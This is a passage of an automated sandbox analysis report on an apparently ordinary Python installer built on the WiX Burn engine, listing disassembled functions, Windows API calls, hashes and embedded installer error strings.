                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$CompareFree
                                                                                                                                  • String ID: email$name$uri$}vL
                                                                                                                                  • API String ID: 3589242889-1979540649
                                                                                                                                  • Opcode ID: d8ef91e4b42d391209433ae855456bd26a676b11d38d429c4c76db233e04ba4b
                                                                                                                                  • Instruction ID: 49128d7cdcaf166fde33e1b6c44a9364ea9306ab32744974ae4c2c36bac54b77
                                                                                                                                  • Opcode Fuzzy Hash: d8ef91e4b42d391209433ae855456bd26a676b11d38d429c4c76db233e04ba4b
                                                                                                                                  • Instruction Fuzzy Hash: C6415F3A904219FBCF51DB95CC45FAEB775AF04721F2442A9E921AB2E1CB389E00DF54
                                                                                                                                  APIs
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0048F51F
                                                                                                                                    • Part of subcall function 0048419A: CreateDirectoryW.KERNEL32(?,004CB478,00000000,00000000,?,0049A0C3,00000000,00000000,?,00000000,5TH,00000000,?,?,0048D652,?), ref: 004841A8
                                                                                                                                    • Part of subcall function 0048419A: GetLastError.KERNEL32(?,0049A0C3,00000000,00000000,?,00000000,5TH,00000000,?,?,0048D652,?,00000000,00000000), ref: 004841B6
                                                                                                                                  • lstrlenA.KERNEL32(002E0032,00000000,00000094,00000000,00000094,crypt32.dll,crypt32.dll,00490545,swidtag,00000094,004CB4F0,00330074,00490545,00000000,crypt32.dll,00000000), ref: 0048F572
                                                                                                                                    • Part of subcall function 004C51E2: CreateFileW.KERNEL32(002E0032,40000000,00000001,00000000,00000002,00000080,00000000,00490545,00000000,?,0048F589,004CB4F0,00000080,002E0032,00000000), ref: 004C51FA
                                                                                                                                    • Part of subcall function 004C51E2: GetLastError.KERNEL32(?,0048F589,004CB4F0,00000080,002E0032,00000000,?,00490545,crypt32.dll,00000094,?,?,?,?,?,00000000), ref: 004C5207
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                                                                                  • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$crypt32.dll$swidtag
                                                                                                                                  • API String ID: 904508749-2959304021
                                                                                                                                  • Opcode ID: ec496f6e89484c32c033b272a7b58837d6f286c9bf29cf8ea89d205a65c82a42
                                                                                                                                  • Instruction ID: ff82ceaffb4b362e577979a0722eeb0c5632cc11f4d24e1f798fc0153436fc96
                                                                                                                                  • Opcode Fuzzy Hash: ec496f6e89484c32c033b272a7b58837d6f286c9bf29cf8ea89d205a65c82a42
                                                                                                                                  • Instruction Fuzzy Hash: FD31AE32D01225FBCB01BEA4CD11B9DBBB4EF04710F20897BF910B6251E7799A54AB98
                                                                                                                                  APIs
                                                                                                                                  • LoadBitmapW.USER32(?,00000001), ref: 0049E259
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049E265
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0049E2AC
                                                                                                                                  • GetCursorPos.USER32(?), ref: 0049E2CD
                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0049E2DF
                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 0049E2F5
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\splashscreen.cpp, xrefs: 0049E289
                                                                                                                                  • (, xrefs: 0049E2EC
                                                                                                                                  • Failed to load splash screen bitmap., xrefs: 0049E293
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                                  • String ID: ($Failed to load splash screen bitmap.$c:\agent\_work\138\s\src\burn\engine\splashscreen.cpp
                                                                                                                                  • API String ID: 2342928100-1828971274
                                                                                                                                  • Opcode ID: 418d5d1c8180fd20bbea95dbda4d7fc874487c6533d538b3707d4fa2f0a2227c
                                                                                                                                  • Instruction ID: 8da1f8b762fafda955164220418946f8c825733e6ac03335c9aa62716af23919
                                                                                                                                  • Opcode Fuzzy Hash: 418d5d1c8180fd20bbea95dbda4d7fc874487c6533d538b3707d4fa2f0a2227c
                                                                                                                                  • Instruction Fuzzy Hash: EE316F71A002199FDB50CFB9D946A9EBBB4FF08710F14812AED04EB281DB74E900CBA4
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0048CE0A: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0048E4DA,000000FF,00000000,00000000,0048E4DA,?,?,0048DC82,?,?,?,?), ref: 0048CE35
                                                                                                                                  • CreateFileW.KERNEL32(004CB508,80000000,00000005,00000000,00000003,08000000,00000000,feclient.dll,?,00000000,004CB478,?,00000001,5TH,00000000,?), ref: 0048CA06
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00497802,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0048CA4B
                                                                                                                                  Strings
                                                                                                                                  • Failed to open catalog in working path: %ls, xrefs: 0048CA79
                                                                                                                                  • Failed to verify catalog signature: %ls, xrefs: 0048CA44
                                                                                                                                  • Failed to find payload for catalog file., xrefs: 0048CA90
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\catalog.cpp, xrefs: 0048CA6C
                                                                                                                                  • feclient.dll, xrefs: 0048C9E1
                                                                                                                                  • Failed to get catalog local file path, xrefs: 0048CA89
                                                                                                                                  • 5TH, xrefs: 0048C9B8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareCreateErrorFileLastString
                                                                                                                                  • String ID: 5TH$Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$c:\agent\_work\138\s\src\burn\engine\catalog.cpp$feclient.dll
                                                                                                                                  • API String ID: 1774366664-1124469739
                                                                                                                                  • Opcode ID: 36780658efb4aab23d03badb8f47d1735a4be761bfbc9cc75dbf3cd23598363b
                                                                                                                                  • Instruction ID: 47bcc84c22f601e4d84897de572b168567f79c28c2b1f7956f53d876064d5d85
                                                                                                                                  • Opcode Fuzzy Hash: 36780658efb4aab23d03badb8f47d1735a4be761bfbc9cc75dbf3cd23598363b
                                                                                                                                  • Instruction Fuzzy Hash: 0731C672900629FBC715EBA5CC86F5DBA64FF04750F21892BF914AB240E778ED1097E8
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,?,?,004CB4F0), ref: 0049514C
                                                                                                                                  • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 004951EA
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00495203
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCurrentHandle
                                                                                                                                  • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                  • API String ID: 2815245435-1352204306
                                                                                                                                  • Opcode ID: 45bb57ad4aebfa42156c1648b6ee1809fa206bfd09097a6ae1a1ac254bae7dca
                                                                                                                                  • Instruction ID: 3915d91737b904d716ea02c8b5252138bdfdae5c59495bc620ac70c9d7df95fc
                                                                                                                                  • Opcode Fuzzy Hash: 45bb57ad4aebfa42156c1648b6ee1809fa206bfd09097a6ae1a1ac254bae7dca
                                                                                                                                  • Instruction Fuzzy Hash: 59216B75D00619FFCF02AF95D896DAEBBB8EF05354B20807FF914A2201C7399E109B88
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00486951
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00486958
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486962
                                                                                                                                  Strings
                                                                                                                                  • DllGetVersion, xrefs: 00486943
                                                                                                                                  • Failed to get msi.dll version info., xrefs: 004869AA
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 00486986
                                                                                                                                  • msi, xrefs: 00486948
                                                                                                                                  • Failed to find DllGetVersion entry point in msi.dll., xrefs: 00486990
                                                                                                                                  • Failed to set variant value., xrefs: 004869CE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                  • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$c:\agent\_work\138\s\src\burn\engine\variable.cpp$msi
                                                                                                                                  • API String ID: 4275029093-3800379381
                                                                                                                                  • Opcode ID: b8b018e2b38aa6d5b08b590156b87c6b9071a2b4ce48091d0c35c9396cb181a2
                                                                                                                                  • Instruction ID: 3da936f541bd4ef8e43a10c1e144a17b865111d443de06a1cbb1f151cd9e275f
                                                                                                                                  • Opcode Fuzzy Hash: b8b018e2b38aa6d5b08b590156b87c6b9071a2b4ce48091d0c35c9396cb181a2
                                                                                                                                  • Instruction Fuzzy Hash: 0F11B7BAE0063566D750AB699C46F7FB6A49B04711F11092BFD05F6180D678ED0086ED
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00484882,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00485506,?), ref: 0048D775
                                                                                                                                  • GetLastError.KERNEL32(?,00484882,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00485506,?,?), ref: 0048D782
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0048D7BA
                                                                                                                                  • GetLastError.KERNEL32(?,00484882,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00485506,?,?), ref: 0048D7C6
                                                                                                                                  Strings
                                                                                                                                  • BootstrapperApplicationCreate, xrefs: 0048D7B4
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\userexperience.cpp, xrefs: 0048D7A3, 0048D7E7
                                                                                                                                  • Failed to load UX DLL., xrefs: 0048D7AD
                                                                                                                                  • Failed to get BootstrapperApplicationCreate entry-point, xrefs: 0048D7F1
                                                                                                                                  • Failed to create UX., xrefs: 0048D80A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                  • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$c:\agent\_work\138\s\src\burn\engine\userexperience.cpp
                                                                                                                                  • API String ID: 1866314245-3647149291
                                                                                                                                  • Opcode ID: 58b95223ad10cacaa6415733629b7e48a8ad3517f0aa4ae0a50c15dd63623715
                                                                                                                                  • Instruction ID: 9d6758e6b1d707d79f59c4d8fe092e042c7cecf79eeb2ce7a4a025867e132328
                                                                                                                                  • Opcode Fuzzy Hash: 58b95223ad10cacaa6415733629b7e48a8ad3517f0aa4ae0a50c15dd63623715
                                                                                                                                  • Instruction Fuzzy Hash: EF11DD37E42732A7D7217A955C0AF1F7B94AB00B21F11486BBE54BB2C0EA28DC0047EC
                                                                                                                                  APIs
                                                                                                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0048111A,cabinet.dll,00000009,?,?,00000000), ref: 00481184
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0048111A,cabinet.dll,00000009,?,?,00000000), ref: 0048118F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0048119D
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0048111A,cabinet.dll,00000009,?,?,00000000), ref: 004811B8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004811C0
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0048111A,cabinet.dll,00000009,?,?,00000000), ref: 004811D5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                                  • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                  • API String ID: 3104334766-1824683568
                                                                                                                                  • Opcode ID: 75671e4af7879d41bd5a996650e0b117e5099a7445e90688e1f534106911c907
                                                                                                                                  • Instruction ID: 9b944c1f2edff04b2bdd48c5c27825e03cf57aed65fc2aba604d831bd2784854
                                                                                                                                  • Opcode Fuzzy Hash: 75671e4af7879d41bd5a996650e0b117e5099a7445e90688e1f534106911c907
                                                                                                                                  • Instruction Fuzzy Hash: C901B131300216BA8B503BA79C0AE6F7B5CEF44755F008027FE15D2150EB78DA028BF8
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0049F59F
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0049F71A
                                                                                                                                  Strings
                                                                                                                                  • UX did not provide container or payload id., xrefs: 0049F709
                                                                                                                                  • Failed to set download URL., xrefs: 0049F679
                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 0049F5F4
                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0049F644
                                                                                                                                  • Failed to set download user., xrefs: 0049F6A2
                                                                                                                                  • Failed to set download password., xrefs: 0049F6C8
                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0049F5B9
                                                                                                                                  • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0049F60A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                  • API String ID: 3168844106-2615595102
                                                                                                                                  • Opcode ID: d85fcb5e0c3b2100afbd96179aff3895b7fb9e077c8fd066edc7e3c4291f792a
                                                                                                                                  • Instruction ID: fc7619547c52932d4864c0d494d5ce0b369dfe8e0e938b798157f5d41c8dc45d
                                                                                                                                  • Opcode Fuzzy Hash: d85fcb5e0c3b2100afbd96179aff3895b7fb9e077c8fd066edc7e3c4291f792a
                                                                                                                                  • Instruction Fuzzy Hash: 6141E331600212EBCF11AFA5C805F6A7BA8AF00710F25417BE800E7291EB7CED5987AD
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,000000FF,?,00497802,5TH,00000000,?), ref: 0049AC71
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,00497802,5TH,00000000,?), ref: 0049ACB5
                                                                                                                                    • Part of subcall function 0049925F: _memcmp.LIBVCRUNTIME ref: 004992ED
                                                                                                                                    • Part of subcall function 0049925F: _memcmp.LIBVCRUNTIME ref: 00499327
                                                                                                                                  Strings
                                                                                                                                  • Failed to get signer chain from authenticode certificate., xrefs: 0049ACE3
                                                                                                                                  • 0, xrefs: 0049ABED
                                                                                                                                  • Failed to get provider state from authenticode certificate., xrefs: 0049AC9F
                                                                                                                                  • version.dll, xrefs: 0049AC51
                                                                                                                                  • Failed to verify expected payload against actual certificate chain., xrefs: 0049ACF9
                                                                                                                                  • 5TH, xrefs: 0049ABA0
                                                                                                                                  • Failed authenticode verification of payload: %ls, xrefs: 0049AC52
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cache.cpp, xrefs: 0049AC47, 0049AC95, 0049ACD9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_memcmp
                                                                                                                                  • String ID: 0$5TH$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$c:\agent\_work\138\s\src\burn\engine\cache.cpp$version.dll
                                                                                                                                  • API String ID: 3428363238-2888224779
                                                                                                                                  • Opcode ID: ccaa17ed375884cfa202511eb5776d51e0b2ec506b760afaa6648bb59efabf0d
                                                                                                                                  • Instruction ID: 542228bf7a3680863c4bd8ea8b5f8157c6ace589c3dedf27fe64a72fb4acb0ab
                                                                                                                                  • Opcode Fuzzy Hash: ccaa17ed375884cfa202511eb5776d51e0b2ec506b760afaa6648bb59efabf0d
                                                                                                                                  • Instruction Fuzzy Hash: E84184B2D40229ABDB11DF99D845A9FBAB8AF04714F11413FF805BB380D7789D048BE9
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 004B5A89
                                                                                                                                    • Part of subcall function 004B604F: HeapFree.KERNEL32(00000000,00000000,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?), ref: 004B6065
                                                                                                                                    • Part of subcall function 004B604F: GetLastError.KERNEL32(?,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?,?), ref: 004B6077
                                                                                                                                  • _free.LIBCMT ref: 004B5A95
                                                                                                                                  • _free.LIBCMT ref: 004B5AA0
                                                                                                                                  • _free.LIBCMT ref: 004B5AAB
                                                                                                                                  • _free.LIBCMT ref: 004B5AB6
                                                                                                                                  • _free.LIBCMT ref: 004B5AC1
                                                                                                                                  • _free.LIBCMT ref: 004B5ACC
                                                                                                                                  • _free.LIBCMT ref: 004B5AD7
                                                                                                                                  • _free.LIBCMT ref: 004B5AE2
                                                                                                                                  • _free.LIBCMT ref: 004B5AF0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 0c05b78777da2769bf771fb2e182cf6b56d2ecf4af2e3d55ad3979906a21a0b7
                                                                                                                                  • Instruction ID: 5d376928721fb8ad1195ec0627bbc6414cec2d2dbb02b2aadfa933c7ceb7964c
                                                                                                                                  • Opcode Fuzzy Hash: 0c05b78777da2769bf771fb2e182cf6b56d2ecf4af2e3d55ad3979906a21a0b7
                                                                                                                                  • Instruction Fuzzy Hash: 1A21EC76900108AFCB11FF9AC851DDD7BB9FF48300F0141AAF9199B122DB3ADA94CB94
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004910A0: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00490CF3,?,00000000,?,00000000,00000000), ref: 004910CF
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00490E77
                                                                                                                                  • GetLastError.KERNEL32 ref: 00490E84
                                                                                                                                  Strings
                                                                                                                                  • Failed to append package start action., xrefs: 00490D19
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\plan.cpp, xrefs: 00490EA8
                                                                                                                                  • Failed to append cache action., xrefs: 00490DCE
                                                                                                                                  • Failed to append rollback cache action., xrefs: 00490D53
                                                                                                                                  • Failed to create syncpoint event., xrefs: 00490EB2
                                                                                                                                  • Failed to append payload cache action., xrefs: 00490E2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareCreateErrorEventLastString
                                                                                                                                  • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$c:\agent\_work\138\s\src\burn\engine\plan.cpp
                                                                                                                                  • API String ID: 801187047-4180891441
                                                                                                                                  • Opcode ID: 976e368956c37cc33244db107b670a6664e9b5c25e0519986b0d006dffcde9d8
                                                                                                                                  • Instruction ID: 9ededd1f98276f7bdd8bdd8b4328d5a58c9c6e924305ab63e37441a8a1790972
                                                                                                                                  • Opcode Fuzzy Hash: 976e368956c37cc33244db107b670a6664e9b5c25e0519986b0d006dffcde9d8
                                                                                                                                  • Instruction Fuzzy Hash: CB61AD75500609EFCF05CF59C981AAABBF9EF88310F21846BE8059B311EB38EE41DB54
                                                                                                                                  APIs
                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004992ED
                                                                                                                                    • Part of subcall function 004C5AE9: GetLastError.KERNEL32(?,?,00499312,?,00000003,?,?), ref: 004C5B08
                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00499327
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049939F
                                                                                                                                  Strings
                                                                                                                                  • Failed to find expected public key in certificate chain., xrefs: 00499362
                                                                                                                                  • version.dll, xrefs: 00499276
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cache.cpp, xrefs: 004993C3
                                                                                                                                  • Failed to read certificate thumbprint., xrefs: 00499393
                                                                                                                                  • Failed to get certificate public key identifier., xrefs: 004993CD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
